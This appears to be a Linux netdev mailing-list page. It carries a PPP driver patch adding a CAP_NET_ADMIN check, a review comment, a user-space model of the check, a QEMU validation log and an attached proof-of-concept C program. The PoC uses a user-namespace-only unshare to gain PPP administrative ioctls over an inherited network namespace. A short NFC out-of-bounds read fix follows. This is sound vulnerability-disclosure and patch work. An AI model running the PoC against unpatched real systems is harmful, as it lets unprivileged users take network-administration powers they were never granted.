> namespace before handling unattached PPP administrative ioctls.
>
> This preserves normal pppd operation in the network namespace it is
> actually privileged in, while rejecting the userns-only inherited-netns
> case.
>
> Fixes: 273ec51dd7ce ("net: ppp_generic - introduce net-namespace functionality v2")
> Signed-off-by: Taegu Ha <hataegu0826@gmail.com>
> ---
>  drivers/net/ppp/ppp_generic.c | 3 +++
>  1 file changed, 3 insertions(+)
>
> diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
> index e9b41777be80..c2024684b10d 100644
> --- a/drivers/net/ppp/ppp_generic.c
> +++ b/drivers/net/ppp/ppp_generic.c
> @@ -1057,6 +1057,9 @@ static int ppp_unattached_ioctl(struct net *net, struct ppp_file *pf,
>         struct ppp_net *pn;
>         int __user *p = (int __user *)arg;
>
> +       if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
> +               return -EPERM;
> +
>         switch (cmd) {
>         case PPPIOCNEWUNIT:
>                 /* Create a new ppp unit */
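
Review bot: `ns_capable(net->user_ns, CAP_NET_ADMIN)` evaluates the credentials of the task issuing the ioctl, not the opener's credentials in `file->f_cred` that the changelog says authorize the open, so a `/dev/ppp` descriptor passed between tasks is now judged by whoever calls the ioctl. The commit message should say that this is intended (as opposed to a `file_ns_capable()` check). Because the test sits before `switch (cmd)`, unknown commands from such callers also return -EPERM instead of reaching the switch.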
> --
> 2.43.0
>
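
The authorization gap described in the quoted commit message, and the effect of the added check, can be modelled in user space. The following C program is an added example, not code from the patch or the kernel: `ns_capable_model()` is a simplified stand-in for the kernel's capability walk, and all struct, function and variable names are hypothetical, with the scenario values constructed to mirror the log lines above.

```c
/* Added example: user-space model of the /dev/ppp authorization logic
 * discussed above. Not kernel code; all names here are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

struct user_ns {
	const struct user_ns *parent;	/* NULL for the initial user namespace */
	int level;			/* nesting depth, 0 = initial */
	unsigned int owner;		/* uid that created this namespace */
};

struct net_ns {
	const struct user_ns *user_ns;	/* models net->user_ns */
};

struct cred {
	const struct user_ns *user_ns;	/* namespace the task lives in */
	unsigned int euid;
	bool cap_net_admin;		/* CAP_NET_ADMIN held in cred->user_ns */
};

/* Simplified ns_capable(): walk from the target namespace towards the root. */
static bool ns_capable_model(const struct cred *c, const struct user_ns *target)
{
	for (const struct user_ns *ns = target; ns; ns = ns->parent) {
		if (ns == c->user_ns)
			return c->cap_net_admin;
		if (ns->level <= c->user_ns->level)
			return false;	/* target is not below the task's namespace */
		if (ns->parent == c->user_ns && ns->owner == c->euid)
			return true;	/* creator is privileged in its child namespace */
	}
	return false;
}

/* open("/dev/ppp"): checked against the opener's own user namespace
 * (file->f_cred->user_ns in the commit message). */
static bool ppp_open_allowed(const struct cred *c)
{
	return ns_capable_model(c, c->user_ns);
}

/* Unattached ioctl such as PPPIOCNEWUNIT acting on `net`.
 * patched == false: no check beyond the open (the behaviour being fixed).
 * patched == true:  the added ns_capable(net->user_ns, CAP_NET_ADMIN) test. */
static bool ppp_ioctl_allowed(const struct cred *c, const struct net_ns *net,
			      bool patched)
{
	if (patched && !ns_capable_model(c, net->user_ns))
		return false;		/* -EPERM */
	return true;
}

/* True when open() followed by PPPIOCNEWUNIT on `net` would both succeed. */
static bool ppp_newunit_succeeds(const struct cred *c, const struct net_ns *net,
				 bool patched)
{
	return ppp_open_allowed(c) && ppp_ioctl_allowed(c, net, patched);
}

/* Constructed scenario: initial namespaces plus one child user namespace
 * created by uid 65534, with and without its own network namespace. */
static const struct user_ns init_userns = { NULL, 0, 0 };
static const struct user_ns child_userns = { &init_userns, 1, 65534 };
static const struct net_ns init_net = { &init_userns };
static const struct net_ns child_net = { &child_userns };

static const struct cred nobody = { &init_userns, 65534, false };
static const struct cred after_unshare = { &child_userns, 65534, true };
static const struct cred host_pppd = { &init_userns, 0, true };

int main(void)
{
	printf("open before userns:               %d\n",
	       ppp_open_allowed(&nobody));
	printf("open after userns-only unshare:   %d\n",
	       ppp_open_allowed(&after_unshare));
	printf("NEWUNIT on inherited netns, old:  %d\n",
	       ppp_newunit_succeeds(&after_unshare, &init_net, false));
	printf("NEWUNIT on inherited netns, new:  %d\n",
	       ppp_newunit_succeeds(&after_unshare, &init_net, true));
	printf("NEWUNIT on own netns, new:        %d\n",
	       ppp_newunit_succeeds(&after_unshare, &child_net, true));
	printf("host pppd on init netns, new:     %d\n",
	       ppp_newunit_succeeds(&host_pppd, &init_net, true));
	return 0;
}
```

The last two rows correspond to the commit message's claim that pppd keeps working in a network namespace it is actually privileged in.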

[-- Attachment #2: ppp_v3_validation.log --]
[-- Type: application/octet-stream, Size: 25420 bytes --]

[    0.032906]   Normal   empty
[    0.032918] Movable zone start for each node
[    0.032932] Early memory node ranges
[    0.032949]   node   0: [mem 0x0000000000001000-0x000000000009efff]
[    0.033016]   node   0: [mem 0x0000000000100000-0x000000003ffdffff]
[    0.033083] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffdffff]
[    0.033573] On node 0, zone DMA: 1 pages in unavailable ranges
[    0.033719] On node 0, zone DMA: 97 pages in unavailable ranges
[    0.066668] On node 0, zone DMA32: 32 pages in unavailable ranges
[    0.066853] setup_percpu: NR_CPUS:64 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1
[    0.069179] percpu: Embedded 52 pages/cpu s175576 r8192 d29224 u2097152
[    0.070901] Kernel command line: console=ttyS0 rdinit=/init panic=-1
[    0.071568] printk: log buffer data + meta data: 262144 + 917504 = 1179648 bytes
[    0.071813] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes, linear)
[    0.071911] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes, linear)
[    0.074500] Fallback order for Node 0: 0 
[    0.074662] Built 1 zonelists, mobility grouping on.  Total pages: 262014
[    0.074672] Policy zone: DMA32
[    0.074799] mem auto-init: stack:all(zero), heap alloc:off, heap free:off
[    0.082635] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[    0.090001] Dynamic Preempt: lazy
[    0.094095] rcu: Preemptible hierarchical RCU implementation.
[    0.094103] rcu: 	RCU event tracing is enabled.
[    0.094117] rcu: 	RCU restricting CPUs from NR_CPUS=64 to nr_cpu_ids=1.
[    0.094201] 	Trampoline variant of Tasks RCU enabled.
[    0.094206] 	Tracing variant of Tasks RCU enabled.
[    0.094258] rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
[    0.094273] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
[    0.095174] RCU Tasks: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1 rcu_task_cpu_ids=1.
[    0.110272] NR_IRQS: 4352, nr_irqs: 256, preallocated irqs: 16
[    0.115637] rcu: srcu_init: Setting srcu_struct sizes based on contention.
[    0.120260] Console: colour VGA+ 80x25
[    0.121453] printk: legacy console [ttyS0] enabled
[    0.135220] ACPI: Core revision 20251212
[    0.138632] clocksource: hpet: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604467 ns
[    0.139929] APIC: Switch to symmetric I/O mode setup
[    0.144392] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
[    0.149615] clocksource: tsc-early: mask: 0xffffffffffffffff max_cycles: 0x6d58fc573b0, max_idle_ns: 881590936876 ns
[    0.150050] Calibrating delay loop (skipped), value calculated using timer frequency.. 7585.98 BogoMIPS (lpj=3792994)
[    0.152522] Last level iTLB entries: 4KB 512, 2MB 255, 4MB 127
[    0.152657] Last level dTLB entries: 4KB 512, 2MB 255, 4MB 127, 1GB 0
[    0.152961] mitigations: Enabled attack vectors: user_kernel, user_user, SMT mitigations: auto
[    0.153340] Spectre V2 : Mitigation: Retpolines
[    0.153513] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization
[    0.153725] Spectre V2 : Spectre v2 / SpectreRSB: Filling RSB on context switch and VMEXIT
[    0.154352] x86/fpu: x87 FPU will use FXSAVE
[    0.418474] Freeing SMP alternatives memory: 56K
[    0.419136] pid_max: default: 32768 minimum: 301
[    0.424060] SELinux:  Initializing.
[    0.429842] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes, linear)
[    0.429944] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes, linear)
[    0.435955] VFS: Finished mounting rootfs on nullfs
[    0.551901] smpboot: CPU0: AMD QEMU Virtual CPU version 2.5+ (family: 0xf, model: 0x6b, stepping: 0x1)
[    0.557585] Performance Events: PMU not available due to virtualization, using software events only.
[    0.558212] signal: max sigframe size: 1440
[    0.559136] rcu: Hierarchical SRCU implementation.
[    0.559257] rcu: 	Max phase no-delay instances is 400.
[    0.561958] smp: Bringing up secondary CPUs ...
[    0.564130] smp: Brought up 1 node, 1 CPU
[    0.564279] smpboot: Total of 1 processors activated (7585.98 BogoMIPS)
[    0.569817] Memory: 983832K/1048056K available (19112K kernel code, 3002K rwdata, 7644K rodata, 2932K init, 596K bss, 60904K reserved, 0K cma-reserved)
[    0.574670] devtmpfs: initialized
[    0.580583] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
[    0.581206] posixtimers hash table entries: 512 (order: 1, 8192 bytes, linear)
[    0.581516] futex hash table entries: 256 (16384 bytes on 1 NUMA nodes, total 16 KiB, linear).
[    0.583781] PM: RTC time: 06:57:28, date: 2026-04-09
[    0.587571] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[    0.589521] audit: initializing netlink subsys (disabled)
[    0.591100] audit: type=2000 audit(1775717847.449:1): state=initialized audit_enabled=0 res=1
[    0.593761] thermal_sys: Registered thermal governor 'step_wise'
[    0.594067] cpuidle: using governor menu
[    0.596122] PCI: Using configuration type 1 for base access
[    0.597816] kprobes: kprobe jump-optimization is enabled. All kprobes are optimized if possible.
[    0.602020] HugeTLB: registered 2.00 MiB page size, pre-allocated 0 pages
[    0.602183] HugeTLB: 28 KiB vmemmap can be freed for a 2.00 MiB page
[    0.607208] ACPI: Added _OSI(Module Device)
[    0.607316] ACPI: Added _OSI(Processor Device)
[    0.607404] ACPI: Added _OSI(Processor Aggregator Device)
[    0.631255] ACPI: 1 ACPI AML tables successfully acquired and loaded
[    0.648440] ACPI: \_SB_: platform _OSC: OS support mask [002a7eee]
[    0.653647] ACPI: Interpreter enabled
[    0.656377] ACPI: PM: (supports S0 S3 S4 S5)
[    0.656496] ACPI: Using IOAPIC for interrupt routing
[    0.656812] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug
[    0.656926] PCI: Using E820 reservations for host bridge windows
[    0.657966] ACPI: Enabled 2 GPEs in block 00 to 0F
[    0.701836] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])
[    0.704285] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI HPX-Type3]
[    0.704523] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI]
[    0.704894] acpi PNP0A03:00: _OSC: platform retains control of PCIe features (AE_ERROR)
[    0.705299] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended configuration space under this bridge
[    0.709334] PCI host bridge to bus 0000:00
[    0.709556] pci_bus 0000:00: root bus resource [io  0x0000-0x0cf7 window]
[    0.709759] pci_bus 0000:00: root bus resource [io  0x0d00-0xffff window]
[    0.711907] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]
[    0.712086] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfebfffff window]
[    0.712231] pci_bus 0000:00: root bus resource [mem 0x100000000-0x17fffffff window]
[    0.712460] pci_bus 0000:00: root bus resource [bus 00-ff]
[    0.713332] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000 conventional PCI endpoint
[    0.719885] pci 0000:00:01.0: [8086:7000] type 00 class 0x060100 conventional PCI endpoint
[    0.722529] pci 0000:00:01.1: [8086:7010] type 00 class 0x010180 conventional PCI endpoint
[    0.723038] pci 0000:00:01.1: BAR 4 [io  0xc040-0xc04f]
[    0.723193] pci 0000:00:01.1: BAR 0 [io  0x01f0-0x01f7]: legacy IDE quirk
[    0.723336] pci 0000:00:01.1: BAR 1 [io  0x03f6]: legacy IDE quirk
[    0.723474] pci 0000:00:01.1: BAR 2 [io  0x0170-0x0177]: legacy IDE quirk
[    0.723612] pci 0000:00:01.1: BAR 3 [io  0x0376]: legacy IDE quirk
[    0.726287] pci 0000:00:01.3: [8086:7113] type 00 class 0x068000 conventional PCI endpoint
[    0.726646] pci 0000:00:01.3: quirk: [io  0x0600-0x063f] claimed by PIIX4 ACPI
[    0.726806] pci 0000:00:01.3: quirk: [io  0x0700-0x070f] claimed by PIIX4 SMB
[    0.727216] pci 0000:00:02.0: [1234:1111] type 00 class 0x030000 conventional PCI endpoint
[    0.729917] pci 0000:00:02.0: BAR 0 [mem 0xfd000000-0xfdffffff pref]
[    0.730096] pci 0000:00:02.0: BAR 2 [mem 0xfebb0000-0xfebb0fff]
[    0.730215] pci 0000:00:02.0: ROM [mem 0xfeba0000-0xfebaffff pref]
[    0.730487] pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]
[    0.731018] pci 0000:00:03.0: [8086:100e] type 00 class 0x020000 conventional PCI endpoint
[    0.731742] pci 0000:00:03.0: BAR 0 [mem 0xfeb80000-0xfeb9ffff]
[    0.731878] pci 0000:00:03.0: BAR 1 [io  0xc000-0xc03f]
[    0.733916] pci 0000:00:03.0: ROM [mem 0xfeb00000-0xfeb7ffff pref]
[    0.746347] ACPI: PCI: Interrupt link LNKA configured for IRQ 10
[    0.746999] ACPI: PCI: Interrupt link LNKB configured for IRQ 10
[    0.747436] ACPI: PCI: Interrupt link LNKC configured for IRQ 11
[    0.747848] ACPI: PCI: Interrupt link LNKD configured for IRQ 11
[    0.750066] ACPI: PCI: Interrupt link LNKS configured for IRQ 9
[    0.754143] iommu: Default domain type: Translated
[    0.754267] iommu: DMA domain TLB invalidation policy: lazy mode
[    0.755281] SCSI subsystem initialized
[    0.756351] ACPI: bus type USB registered
[    0.756697] usbcore: registered new interface driver usbfs
[    0.756991] usbcore: registered new interface driver hub
[    0.757173] usbcore: registered new device driver usb
[    0.757462] pps_core: LinuxPPS API ver. 1 registered
[    0.757566] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <giometti@linux.it>
[    0.757760] PTP clock support registered
[    0.763048] Advanced Linux Sound Architecture Driver Initialized.
[    0.771499] NetLabel: Initializing
[    0.771586] NetLabel:  domain hash size = 128
[    0.771675] NetLabel:  protocols = UNLABELED CIPSOv4 CALIPSO
[    0.772188] NetLabel:  unlabeled traffic allowed by default
[    0.780519] PCI: Using ACPI for IRQ routing
[    0.780901] e820: register RAM buffer resource [mem 0x0009fc00-0x0009ffff]
[    0.783021] e820: register RAM buffer resource [mem 0x3ffe0000-0x3fffffff]
[    0.784206] pci 0000:00:02.0: vgaarb: setting as boot VGA device
[    0.784369] pci 0000:00:02.0: vgaarb: bridge control possible
[    0.784505] pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none
[    0.784684] vgaarb: loaded
[    0.785448] hpet: 3 channels of 0 reserved for per-cpu timers
[    0.785701] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
[    0.785861] hpet0: 3 comparators, 64-bit 100.000000 MHz counter
[    0.795421] clocksource: Switched to clocksource tsc-early
[    0.797247] VFS: Disk quotas dquot_6.6.0
[    0.797438] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[    0.813762] pnp: PnP ACPI init
[    0.818683] pnp: PnP ACPI: found 6 devices
[    0.859200] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns
[    0.861802] NET: Registered PF_INET protocol family
[    0.862657] IP idents hash table entries: 16384 (order: 5, 131072 bytes, linear)
[    0.868129] tcp_listen_portaddr_hash hash table entries: 512 (order: 1, 8192 bytes, linear)
[    0.868392] Table-perturb hash table entries: 65536 (order: 6, 262144 bytes, linear)
[    0.870598] TCP established hash table entries: 8192 (order: 4, 65536 bytes, linear)
[    0.870891] TCP bind hash table entries: 8192 (order: 6, 262144 bytes, linear)
[    0.871172] TCP: Hash tables configured (established 8192 bind 8192)
[    0.871712] UDP hash table entries: 512 (order: 3, 32768 bytes, linear)
[    0.871985] UDP-Lite hash table entries: 512 (order: 3, 32768 bytes, linear)
[    0.874871] NET: Registered PF_UNIX/PF_LOCAL protocol family
[    0.878312] RPC: Registered named UNIX socket transport module.
[    0.878526] RPC: Registered udp transport module.
[    0.878625] RPC: Registered tcp transport module.
[    0.878721] RPC: Registered tcp-with-tls transport module.
[    0.878828] RPC: Registered tcp NFSv4.1 backchannel transport module.
[    0.883103] pci_bus 0000:00: resource 4 [io  0x0000-0x0cf7 window]
[    0.883249] pci_bus 0000:00: resource 5 [io  0x0d00-0xffff window]
[    0.883376] pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]
[    0.885477] pci_bus 0000:00: resource 7 [mem 0x40000000-0xfebfffff window]
[    0.885619] pci_bus 0000:00: resource 8 [mem 0x100000000-0x17fffffff window]
[    0.886084] pci 0000:00:01.0: PIIX3: Enabling Passive Release
[    0.886245] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[    0.886471] PCI: CLS 0 bytes, default 64
[    0.898609] Initialise system trusted keyrings
[    0.901468] Unpacking initramfs...
[    0.903582] workingset: timestamp_bits=56 max_order=18 bucket_order=0
[    0.911623] NFS: Registering the id_resolver key type
[    0.911945] Key type id_resolver registered
[    0.912044] Key type id_legacy registered
[    0.912168] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[    0.912460] nfs4flexfilelayout_init: NFSv4 Flexfile Layout Driver Registering...
[    0.913695] Freeing initrd memory: 812K
[    0.916665] 9p: Installing v9fs 9p2000 file system support
[    1.016482] Key type asymmetric registered
[    1.016619] Asymmetric key parser 'x509' registered
[    1.016890] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[    1.017255] io scheduler mq-deadline registered
[    1.017382] io scheduler kyber registered
[    1.021001] input: Power Button as /devices/platform/LNXPWRBN:00/input/input0
[    1.023749] ACPI: button: Power Button [PWRF]
[    1.029049] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[    1.035147] 00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A
[    1.043450] Non-volatile memory driver v1.3
[    1.043582] Linux agpgart interface v0.103
[    1.044804] ACPI: bus type drm_connector registered
[    1.065113] loop: module loaded
[    1.073987] scsi host0: ata_piix
[    1.077567] scsi host1: ata_piix
[    1.077866] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc040 irq 14 lpm-pol 0
[    1.078033] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc048 irq 15 lpm-pol 0
[    1.081829] e100: Intel(R) PRO/100 Network Driver
[    1.081944] e100: Copyright(c) 1999-2006 Intel Corporation
[    1.082095] e1000: Intel(R) PRO/1000 Network Driver
[    1.082194] e1000: Copyright (c) 1999-2006 Intel Corporation.
[    1.229255] ata2: found unknown device (class 0)
[    1.237034] ata2.00: ATAPI: QEMU DVD-ROM, 2.5+, max UDMA/100
[    1.251715] scsi 1:0:0:0: CD-ROM            QEMU     QEMU DVD-ROM     2.5+ PQ: 0 ANSI: 5
[    1.275007] sr 1:0:0:0: [sr0] scsi3-mmc drive: 4x/4x cd/rw xa/form2 tray
[    1.275278] cdrom: Uniform CD-ROM driver Revision: 3.20
[    1.289625] ACPI: \_SB_.LNKC: Enabled at IRQ 11
[    1.296055] sr 1:0:0:0: Attached scsi generic sg0 type 5
[    1.733062] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 52:54:00:12:34:56
[    1.733476] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection
[    1.733773] e1000e: Intel(R) PRO/1000 Network Driver
[    1.733879] e1000e: Copyright(c) 1999 - 2015 Intel Corporation.
[    1.734339] sky2: driver version 1.30
[    1.734584] PPP generic driver version 2.4.2
[    1.736095] usbcore: registered new interface driver usblp
[    1.736299] usbcore: registered new interface driver usb-storage
[    1.736819] i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12
[    1.738820] serio: i8042 KBD port at 0x60,0x64 irq 1
[    1.739060] serio: i8042 AUX port at 0x60,0x64 irq 12
[    1.740386] rtc_cmos 00:05: RTC can wake from S4
[    1.742152] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
[    1.746735] rtc_cmos 00:05: registered as rtc0
[    1.747334] rtc_cmos 00:05: alarms up to one day, y3k, 242 bytes nvram, hpet irqs
[    1.749107] device-mapper: ioctl: 4.50.0-ioctl (2025-04-28) initialised: dm-devel@lists.linux.dev
[    1.749448] amd_pstate: the _CPC object is not present in SBIOS or ACPI disabled
[    1.749736] hid: raw HID events driver (C) Jiri Kosina
[    1.750724] usbcore: registered new interface driver usbhid
[    1.750850] usbhid: USB HID core driver
[    1.754469] Initializing XFRM netlink socket
[    1.754749] NET: Registered PF_INET6 protocol family
[    1.760913] Segment Routing with IPv6
[    1.761299] In-situ OAM (IOAM) with IPv6
[    1.761840] sit: IPv6, IPv4 and MPLS over IPv4 tunneling driver
[    1.763431] NET: Registered PF_PACKET protocol family
[    1.764332] 9pnet: Installing 9P2000 support
[    1.764572] Key type dns_resolver registered
[    1.765750] IPI shorthand broadcast: enabled
[    1.779393] sched_clock: Marking stable (1754019400, 24952567)->(1797996967, -19025000)
[    1.781040] registered taskstats version 1
[    1.781174] Loading compiled-in X.509 certificates
[    1.788180] Demotion targets for Node 0: null
[    1.790030] PM:   Magic number: 6:739:973
[    1.790379] netconsole: network logging started
[    1.791041] cfg80211: Loading compiled-in X.509 certificates for regulatory database
[    1.798826] kworker/u4:1 (53) used greatest stack depth: 15064 bytes left
[    1.804701] Loaded X.509 cert 'sforshee: 00b28ddf47aef9cea7'
[    1.805208] Loaded X.509 cert 'wens: 61c038651aabdcf94bd0ac7ff06c7248db18c600'
[    1.805841] ALSA device list:
[    1.805941]   No soundcards found.
[    1.806864] faux_driver regulatory: Direct firmware load for regulatory.db failed with error -2
[    1.807208] cfg80211: failed to load regulatory.db
[    1.857494] Freeing unused kernel image (initmem) memory: 2932K
[    1.857858] Write protecting the kernel read-only data: 28672k
[    1.859321] Freeing unused kernel image (text/rodata gap) memory: 1364K
[    1.859739] Freeing unused kernel image (rodata/data gap) memory: 548K
[    1.903063] tsc: Refined TSC clocksource calibration: 3792.948 MHz
[    1.903386] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x6d58a4c4524, max_idle_ns: 881590912659 ns
[    1.903659] clocksource: Switched to clocksource tsc
[    1.958248] x86/mm: Checked W+X mappings: passed, no W+X pages found.
[    1.958577] Run /init as init process
[*] initial netns ino=4026531833
[*] dropped to uid=65534 gid=65534 before userns
[*] open(/dev/ppp) before userns failed as expected: Operation not permitted
[*] after userns-only unshare netns ino=4026531833
[*] now uid=0 gid=65534 in new userns
[*] open(/dev/ppp) after userns succeeded
ioctl(PPPIOCNEWUNIT): Operation not permitted
[    2.002904] Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000100
[    2.003364] CPU: 0 UID: 65534 PID: 1 Comm: init Not tainted 7.0.0-rc6-00005-g48278fa03093-dirty #3 PREEMPT(lazy) 
[    2.003572] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    2.003846] Call Trace:
[    2.004229]  <TASK>
[    2.004380]  vpanic+0x32a/0x4b0
[    2.004617]  panic+0x5e/0x60
[    2.004685]  do_exit+0x99f/0xb40
[    2.004751]  do_group_exit+0x2b/0x80
[    2.004820]  __x64_sys_exit_group+0x13/0x20
[    2.004907]  x64_sys_call+0x12e2/0x1880
[    2.004982]  do_syscall_64+0xf1/0x530
[    2.005056]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[    2.005230] RIP: 0033:0x41ac2d
[    2.005418] Code: ff ff ff 64 c7 00 26 00 00 00 eb ea 90 f3 0f 1e fa 48 c7 c6 c0 ff ff ff ba e7 00 00 00 eb 07 66 0f 1f 44 00 00 f4 89 d0 0f 05 <48> 3d 00 f0 ff ff 76 f3 f7 d8 64 89 06 eb ec 0f 1f 40 00 f3 0f 1e
[    2.005774] RSP: 002b:00007ffd9b362588 EFLAGS: 00000213 ORIG_RAX: 00000000000000e7
[    2.005926] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 000000000041ac2d
[    2.006054] RDX: 00000000000000e7 RSI: ffffffffffffffc0 RDI: 0000000000000001
[    2.006179] RBP: 000000000000fffe R08: 0000000000000000 R09: 0000000000000007
[    2.006306] R10: 000000003c6658f0 R11: 0000000000000213 R12: 0000000000487146
[    2.006439] R13: 00007ffd9b3626e8 R14: 00000000004ae868 R15: 0000000000000001
[    2.006596]  </TASK>
[    2.006901] Kernel Offset: 0x38600000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)

[-- Attachment #3: ppp_poc_init_v3.c --]
[-- Type: application/octet-stream, Size: 3036 bytes --]

#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/reboot.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#include <sys/types.h>
#include <unistd.h>

#include <linux/if_ppp.h>
#include <linux/reboot.h>

static void die(const char *msg)
{
	perror(msg);
	fflush(stdout);
	reboot(LINUX_REBOOT_CMD_POWER_OFF);
	_exit(1);
}

static void write_file(const char *path, const char *buf)
{
	int fd = open(path, O_WRONLY);
	size_t len = strlen(buf);

	if (fd < 0)
		die(path);
	if (write(fd, buf, len) != (ssize_t)len)
		die(path);
	close(fd);
}

static unsigned long long netns_ino(void)
{
	struct stat st;

	if (stat("/proc/self/ns/net", &st) < 0)
		die("stat(/proc/self/ns/net)");
	return (unsigned long long)st.st_ino;
}

int main(void)
{
	unsigned long long before, after;
	int fd, unit = -1;

	if (mkdir("/proc", 0555) < 0 && errno != EEXIST)
		die("mkdir(/proc)");
	if (mkdir("/sys", 0555) < 0 && errno != EEXIST)
		die("mkdir(/sys)");
	if (mkdir("/dev", 0755) < 0 && errno != EEXIST)
		die("mkdir(/dev)");

	if (mount("proc", "/proc", "proc", 0, NULL) < 0)
		die("mount(proc)");
	if (mount("sysfs", "/sys", "sysfs", 0, NULL) < 0)
		die("mount(sysfs)");
	if (mount("devtmpfs", "/dev", "devtmpfs", 0, "mode=0755") < 0)
		die("mount(devtmpfs)");

	if (access("/dev/ppp", F_OK) < 0 &&
	    mknod("/dev/ppp", S_IFCHR | 0666, makedev(108, 0)) < 0 &&
	    errno != EEXIST)
		die("mknod(/dev/ppp)");
	if (chmod("/dev/ppp", 0666) < 0)
		die("chmod(/dev/ppp)");

	before = netns_ino();
	printf("[*] initial netns ino=%llu\n", before);

	if (setresgid(65534, 65534, 65534) < 0)
		die("setresgid(65534)");
	if (setresuid(65534, 65534, 65534) < 0)
		die("setresuid(65534)");
	if (prctl(PR_SET_DUMPABLE, 1) < 0)
		die("prctl(PR_SET_DUMPABLE)");

	printf("[*] dropped to uid=%d gid=%d before userns\n", getuid(), getgid());

	fd = open("/dev/ppp", O_RDWR);
	if (fd >= 0) {
		printf("[!] open(/dev/ppp) unexpectedly succeeded before userns\n");
		fflush(stdout);
		reboot(LINUX_REBOOT_CMD_POWER_OFF);
		return 1;
	}
	printf("[*] open(/dev/ppp) before userns failed as expected: %s\n",
	       strerror(errno));

	if (unshare(CLONE_NEWUSER) < 0)
		die("unshare(CLONE_NEWUSER)");
	write_file("/proc/self/uid_map", "0 65534 1\n");
	if (setresuid(0, 0, 0) < 0)
		die("setresuid(0)");

	after = netns_ino();
	printf("[*] after userns-only unshare netns ino=%llu\n", after);
	printf("[*] now uid=%d gid=%d in new userns\n", getuid(), getgid());

	fd = open("/dev/ppp", O_RDWR);
	if (fd < 0)
		die("open(/dev/ppp) after userns");
	printf("[*] open(/dev/ppp) after userns succeeded\n");

	if (ioctl(fd, PPPIOCNEWUNIT, &unit) < 0)
		die("ioctl(PPPIOCNEWUNIT)");
	printf("[+] PPPIOCNEWUNIT succeeded, unit=%d\n", unit);
	printf("[+] Unprivileged caller gained PPP admin over the inherited netns via userns-only unshare\n");
	fflush(stdout);

	reboot(LINUX_REBOOT_CMD_POWER_OFF);
	return 0;
}

^ permalink raw reply

* Re: [PATCH] nfc: hci: fix OOB heap read on short HCP frames.
From: Eric Dumazet @ 2026-04-09  7:14 UTC (permalink / raw)
  To: ashutosh desai; +Cc: netdev, davem, kuba, pabeni, horms, linux-kernel
In-Reply-To: <CAKapqNnOF6BO2zE0MwNeM2_Hchp_d-qDQffywCg7Bk-pMcFKpw@mail.gmail.com>

On Wed, Apr 8, 2026 at 3:15 PM ashutosh desai
<ashutoshdesai993@gmail.com> wrote:
>
> Both nfc_hci_recv_from_llc() and nfc_hci_msg_rx_work() read byte 1 of
> an sk_buff (the HCP message header field) without first verifying the
> buffer contains at least NFC_HCI_HCP_HEADER_LEN (2) bytes.
>
> The SHDLC LLC layer only filters zero-length frames; a single-byte
> I-frame from a malicious NFC peer therefore reaches the HCI reassembly
> path where packet->message.header is read one byte past the valid data.
> The same issue is present in the NCI HCI implementation (nci/hci.c)
> via nci_hci_data_received_cb() and nci_hci_msg_rx_work().
>
> Add an explicit length check before accessing the message header at
> all four locations, freeing the skb on malformed input.
>
